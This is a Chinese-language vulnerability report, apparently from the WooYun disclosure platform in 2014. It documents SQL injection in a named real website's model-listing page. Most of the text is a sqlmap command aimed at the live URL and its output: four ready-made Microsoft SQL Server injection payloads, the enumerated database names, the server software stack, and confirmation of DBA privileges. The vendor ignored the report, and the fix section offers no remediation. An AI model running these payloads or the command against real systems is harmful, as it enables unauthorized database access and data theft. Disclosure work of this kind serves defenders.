漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-05-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
来看二哥。
详细说明:
点到为止 , 并未深入。
漏洞证明:
sqlmap.py -u "http://www.china-ef.com/models/modelList.aspx?sex=1"
available databases [9]:
[*] chinaef_db
[*] manager_db
[*] master
[*] media_db
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sex
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sex=1 AND 3705=3705
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sex=1 AND 8765=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(117)+CH
AR(111)+CHAR(113)+(SELECT (CASE WHEN (8765=8765) THEN CHAR(49) ELSE CHAR(48) END
))+CHAR(113)+CHAR(109)+CHAR(107)+CHAR(100)+CHAR(113)))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: sex=1 AND 6444=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS s
ys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers
AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: sex=(SELECT CHAR(113)+CHAR(106)+CHAR(117)+CHAR(111)+CHAR(113)+(SELE
CT (CASE WHEN (7012=7012) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+
CHAR(107)+CHAR(100)+CHAR(113))
---
[04:05:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[04:05:42] [INFO] testing if current user is DBA
current user is DBA: True
[04:05:42] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\administrator\.sqlmap\output\www.china-ef.com'
修复方案:
自行修复。
版权声明:转载请注明来源 杨聪@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝